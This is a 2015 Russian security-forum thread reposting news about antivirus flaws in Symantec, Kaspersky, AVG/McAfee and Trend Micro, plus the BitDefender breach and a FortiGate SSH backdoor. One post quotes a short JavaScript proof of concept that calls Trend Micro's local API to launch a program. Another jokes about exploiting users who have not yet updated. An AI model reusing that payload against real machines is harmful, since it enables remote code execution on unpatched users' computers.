Антивирусы под прицелом #2: взлом BitDefender и серьезные уязвимости в Symantec

Тема в разделе "Новости и статьи IT безопасности", создана пользователем KILLER-S, 4 авг 2015.

↑ ↓
  1. KILLER-S Уважаемый пользователь
    KILLER-S
    Ответить в чате

    Форумчанин

    Регистрация:
    24.12.2014
    Сообщения:
    391
    Симпатии:
    591
    Пол:
    Мужской
    Репа:
    +614 / 7 / -7
    Не так давно мы писали о том, что британские спецслужбы взламывали антивирусные продукты «Лаборатории Касперского», а исследователи из Google (Project Zero) — нашли серьезную уязвимость в продукте ESET NOD32. И надо сказать, что проблемы антивирусных компаний на этом не закончились. 31 июля СМИ растиражировали новость о хакерской атаке, которая привела к краже учетных данных пользователей продуктов BitDefender, кроме того, в этот же день появилась информация об обнаружении целого ряда серьезных уязвимостей в защитном софте компании Symantec.информация о ряде серьезных уязвимостей в продукте Symantec Endpoint Protection. Среди обнаруженных ошибок безопасности продукта Endpoint Protection Manager возможность обхода аутентификации (CVE-2015-1486), повышения привилегий (CVE-2015-1489), чтения и записи файлов (CVE-2015-1487, CVE-2015-1488, CVE-2015-1490), а также осуществления SQL-инъекций (CVE-2015-1491). В Endpoint Client также обнаружена уязвимость, позволяющая осуществлять выполнение произвольного кода (CVE-2015-1492).

    В посте Code White подробно описан процесс проникновения в систему, повышения привилегий и последующего выполнения кода.

    Атака на BitDefender

    Значительно более резонансным событием стала атака на антивирусную компанию BitDefender. При этом главной причиной шумихи в СМИ стал даже не сам факт взлома, а то, что пароли пользователей, которые удалось похитить злоумышленникам, хранились в открытом виде.

    Несмотря на то, что информация о взломе BitDefender попала в СМИ 31 июля, сама атака была осуществлена раньше. Так 24 июля пользователь под ником DetoxRansome обратился к BitDefender с требованием выплатить ему $15 тыс… В противном случае, он грозился опубликовать базу «слитых» учетных записей: [​IMG]

    Как сообщил профильный блог Hacker Film, 25 июля хакер предпринял еще одну попытку монетизировать осуществленный им взлом — на одном из специализированных форумов он выложил часть украденных логинов и паролей (которые были не зашифрованы, позднее сам хакер подтвердил Forbes, что учетные записи хранились в таком виде изначально). [​IMG]

    Позднее хакер опубликовал сообщение о том, что с помощью украденных учетных записей ему удалось проникнуть в системы многих энетрпрайз-клиентов BitDefender. В качестве подтверждения своих слов он опубликовал скриншоты панели аналитики компаний, использовавших антивирусные продукты BitDefender:
    [​IMG]

    Представители BitDefender позднее подтвердили, что опубликованные данные — это действительно активные аккаунты пользователей (компания сбросила пароли для всех пользователей, чьи аккаунты утекли в сеть). Компания также отказалась платить хакеру и «незамедлительно исправила проблему, предприняв меры по недопущению подобных происшествий в будущем».
     
    Последнее редактирование: 5 авг 2015
    • Мне нравится Мне нравится x 5
    • Информативный пост Информативный пост x 1
  2. frostik Житель форума
    frostik
    Ответить в чате

    Форумчанин

    Регистрация:
    16.05.2015
    Сообщения:
    66
    Симпатии:
    47
    Пол:
    Мужской
    Репа:
    +48 / 1 / -0
    ..... и это один из лучших антивирусов
     
  3. KILLER-S Уважаемый пользователь
    KILLER-S
    Ответить в чате

    Форумчанин

    Регистрация:
    24.12.2014
    Сообщения:
    391
    Симпатии:
    591
    Пол:
    Мужской
    Репа:
    +614 / 7 / -7
    Google обнаружила 8 неисправленных уязвимостей в «Антивирусе Касперского»

    Бреши позволяют удаленному пользователю выполнить произвольный код.
    Специалисты Google обнародовали информацию о 8 неисправленных уязвимостях в «Антивирусе Касперского». Все бреши, обнаруженные еще в начале сентября нынешнего года, позволяют удаленное выполнение кода.
    Большинство уязвимостей связаны с различными ошибками, вызывающими переполнение буфера. В ряде случаев злоумышленники получают возможность выполнить произвольный код с привилегиями NT AUTHORITY/SYSTEM.
    Информация об уязвимостях была разглашена в связи с тем, что ЛК не исправила их в положенный срок. Функциональные эксплоиты для всех брешей размещены в открытом доступе.
    На момент написания материала ЛК не среагировала на инцидент.

    Количество уязвимостей:
    8
    CVSSv2 рейтинг:
    (AV:N/AC:L/Au:N/C:C/I:C/A:C/E:F/RL:U/RC:C) = Base:10/Temporal:9.5
    (AV:N/AC:L/Au:N/C:C/I:C/A:C/E:F/RL:U/RC:C) = Base:10/Temporal:9.5
    (AV:N/AC:L/Au:N/C:C/I:C/A:C/E:F/RL:U/RC:C) = Base:10/Temporal:9.5
    (AV:N/AC:L/Au:N/C:C/I:C/A:C/E:F/RL:U/RC:C) = Base:10/Temporal:9.5
    (AV:N/AC:L/Au:N/C:C/I:C/A:C/E:F/RL:U/RC:C) = Base:10/Temporal:9.5
    (AV:N/AC:L/Au:N/C:C/I:C/A:C/E:F/RL:U/RC:C) = Base:10/Temporal:9.5
    (AV:N/AC:L/Au:N/C:C/I:C/A:C/E:F/RL:U/RC:C) = Base:10/Temporal:9.5
    (AV:N/AC:L/Au:N/C:C/I:C/A:C/E:F/RL:U/RC:C) = Base:10/Temporal:9.5
    CVE ID:
    Нет данных
    Вектор эксплуатации:
    Удаленная
    Воздействие:
    Компрометация системы
    CWE ID:
    CWE-119: Ошибки работы с буфером
    Наличие эксплоита:
    Активная эксплуатация уязвимости
    Уязвимые продукты:
    Kaspersky Anti-Virus 2016
    Уязвимые версии:
    Kaspersky Anti-Virus 2016
    Описание:
    Уязвимости позволяют удаленному пользователю скомпрометировать систему.
    1) Уязвимость существует из-за целочисленного переполнения при обработке VB6-файлов. Удаленный пользователь может выполнить произвольный код на целевой системе.
    2) Уязвимость существует из-за повреждения памяти при обработке файлов ExeCryptor. Удаленный пользователь может выполнить произвольный код на целевой системе.
    3) Уязвимость существует из-за целочисленного переполнения при обработке PE-файлов. Удаленный пользователь может выполнить произвольный код на целевой системе.
    4) Уязвимость существует из-за ошибки форматной строки при обработке DEX-файлов. Удаленный пользователь может выполнить произвольный код на целевой системе.
    5) Уязвимость существует из-за переполнения буфера в стеке при обработке CHM файлов . Удаленный пользователь может выполнить произвольный код на целевой системе.
    6) Уязвимость существует из-за повреждения памяти при обработке UPX файлов. Удаленный пользователь может выполнить произвольный код на целевой системе.
    7) Уязвимость существует из-за переполнения буфера в стеке при обработке ThinApp файлов. Удаленный пользователь может выполнить произвольный код на целевой системе.
    8) Уязвимость существует из-за повреждения памяти при распаковке файлов, запакованых с помощью "Yoda's Protector". Удаленный пользователь может выполнить произвольный код на целевой системе.

    URL производителя: http://kaspersky.com

    Решение: На момент написания бюллетеня способов исправления уязвимостей не существует.

    Эксплоит: Kaspersky Antivirus ThinApp Parser Stack Buffer Overflow
    Kaspersky Antivirus UPX Parsing Memory Corruption
    Kaspersky Antivirus CHM Parsing Stack Buffer Overflow
    Kaspersky Antivirus DEX File Format Parsing Memory Corruption
    Kaspersky Antivirus PE Unpacking Integer Overflow
    Kaspersky Antivirus ExeCryptor parsing memory corruption
    Kaspersky Antivirus VB6 parsing integer overflow
    https://code.google.com/p/google-security-research/issues/detail?id=522
    https://code.google.com/p/google-security-research/issues/detail?id=525
    https://code.google.com/p/google-security-research/issues/detail?id=526
    https://code.google.com/p/google-security-research/issues/detail?id=519
    https://code.google.com/p/google-security-research/issues/detail?id=524
    https://code.google.com/p/google-security-research/issues/detail?id=527
    https://code.google.com/p/google-security-research/issues/detail?id=518
    https://code.google.com/p/google-security-research/issues/detail?id=528
     
    • Мне нравится Мне нравится x 2
  4. Антоха Администратор
    Антоха
    Ответить в чате

    Администрация

    Регистрация:
    26.12.2012
    Сообщения:
    3.185
    Симпатии:
    11.100
    Пол:
    Мужской
    Репа:
    +11.248 / 47 / -6
    Jabber:
    Skype:
    А можно ссылочку на источник этой статьи?Просто на оф.форуме каспера пишут,что дыры закрыты.
    p.s.Ага,нашёл-securitylab.ru.Там ща инфу обновили,типа дыры закрыты.
     
    Последнее редактирование: 23 сен 2015
    • Мне нравится Мне нравится x 1
    • Согласен(а) Согласен(а) x 1
  5. KILLER-S Уважаемый пользователь
    KILLER-S
    Ответить в чате

    Форумчанин

    Регистрация:
    24.12.2014
    Сообщения:
    391
    Симпатии:
    591
    Пол:
    Мужской
    Репа:
    +614 / 7 / -7
    Антоха, Да....обновлено...17:48 / 23 Сентября, 2015
    "Обновлено
    Согласно сообщению производителя, исправления доступны через функционал автоматического обновления."
     
    • Мне нравится Мне нравится x 1
  6. X-Shar :)
    X-Shar
    Ответить в чате

    Администрация

    Регистрация:
    03.06.2012
    Сообщения:
    5.813
    Симпатии:
    433
    Пол:
    Мужской
    Репа:
    +969 / 153 / -29
    Jabber:
    Telegram:
    Думаю можно ещё проэксплуатировать, т.к. пока все обновятся...Dmeh-Smeh-Smeh!!!
     
    • Согласен(а) Согласен(а) x 1
  7. KILLER-S Уважаемый пользователь
    KILLER-S
    Ответить в чате

    Форумчанин

    Регистрация:
    24.12.2014
    Сообщения:
    391
    Симпатии:
    591
    Пол:
    Мужской
    Репа:
    +614 / 7 / -7
    Специалисты предупреждают об уязвимостях в продуктах ЛК и McAfee.....

    Бреши могут содержаться в DLP-решениях компаний.
    Обнаруженная в марте нынешнего года уязвимость в антивирусе AVG также присутствует в ряде других программ по обеспечению защиты ПК. Об этом заявили специалисты компании enSilo. Проблема была замечена в антивирусах Kaspersky Total Security и McAfee Virus Scan Enterprise.
    Брешь существует из-за ошибки при выделении памяти для чтения, записи и выполнения кода. Антивирусы используют «предсказуемые» адреса в памяти, позволяющие злоумышленнику проэксплуатировать уязвимости в устаревших сторонних программах. Вредоносы могут обходить антивирусную защиту и заражать компьютеры жертв.
    ЛК и McAfee исправили уязвимость в продуктах в сентября и августе нынешнего года соответственно. Тем не менее, брешь до сих пор может находиться в других программах компаний. По мнению экспертов, DLP-решения и другие продукты вышеуказанных компаний могут быть небезопасны.
    «Подобные уязвимости явно указывают на проблемы в ИБ-экосистеме. С одной стороны, компании наподобие Microsoft тратят огромные средства и ресурсы на улучшение безопасности продуктов. С другой стороны, в любой программе найдется хоть какая-то ошибка. К сожалению, малейшая проблема в стороннем приложении может вывести из строя даже самые надежные системы обеспечения безопасности», - заявил вице-президент enSilo Томер Биттон (Tomer Bitton).
    «Лаборатория Касперского» устранила уязвимость в сентябре нынешнего года. Тогда специалист Google Тэвис Орманди (Tavis Ormandy) обнаружил сразу несколько брешей в антивирусе.
    Предотвращение утечек (англ. Data Leak Prevention, DLP) — технологии предотвращения утечек конфиденциальной информации из информационной системы вовне, а также технические устройства (программные или программно-аппаратные) для такого предотвращения утечек.
     
    • Мне нравится Мне нравится x 3
    • Информативный пост Информативный пост x 1
  8. KILLER-S Уважаемый пользователь
    KILLER-S
    Ответить в чате

    Форумчанин

    Регистрация:
    24.12.2014
    Сообщения:
    391
    Симпатии:
    591
    Пол:
    Мужской
    Репа:
    +614 / 7 / -7
    Обнаружена очень серьезная уязвимость в продуктах Trend Micro.... Тавис Орманди из Google Project Zero обнаружил удивительнейшую уязвимость в антивирусных продуктах Trend Micro под Windows, позволяющую любому веб-сайту, который посещает пользователь, выполнить произвольному команду на его машине.

    Источник: Обнаружена очень серьезная уязвимость в продуктах Trend Micro



    В межсетевых экранах FortiGate выявлен бэкдор....

    В межсетевых экранах, основанных на развиваемой компанией Fortinet платформе FortiGate OS, выявлен бэкдор, позволяющий получить доступ к устройству по SSH с предопределёнными параметрами аутентификации. При попытке входа под логином Fortimanager_Access выводится динамически генерируемая строка, на основе которой можно вычислить пароль, который формируется через цикличное применение хэша SHA1 к этой строке и ряду фиксированных ключевых фраз. Бэкдор присутствует в FortiGate OS начиная с версии 4.x и заканчивая 5.0.7, пишет opennet.ru. Известно, что проблема устранена в выпускеFortiGate OS 5.0.8, опубликованном ещё в августе 2014 года. Компания Fortinet пока никак не прокомментировала информацию о бэкдоре, но, судя-по всему, бэкдор использовался как инженерный вход для службы поддержки.
     
    • Мне нравится Мне нравится x 2
  9. X-Shar :)
    X-Shar
    Ответить в чате

    Администрация

    Регистрация:
    03.06.2012
    Сообщения:
    5.813
    Симпатии:
    433
    Пол:
    Мужской
    Репа:
    +969 / 153 / -29
    Jabber:
    Telegram:
    Не хило так-то:
    Код:
    x = new XMLHttpRequest()
    
    x.open("GET", "https://localhost:49155/api/openUrlInDefaultBrowser?url=c:/windows/system32/calc.exe true);
    
    try { x.send(); } catch (e) {}; 
    44e920d0e4fb4458bbf88504813f7cec1.

    wacko88ohmy88ohmy88
     
    • Мне нравится Мне нравится x 1
  10. X-Shar :)
    X-Shar
    Ответить в чате

    Администрация

    Регистрация:
    03.06.2012
    Сообщения:
    5.813
    Симпатии:
    433
    Пол:
    Мужской
    Репа:
    +969 / 153 / -29
    Jabber:
    Telegram:
    Dmeh-Smeh-Smeh!!!
     
    • Мне нравится Мне нравится x 1

Поделиться этой страницей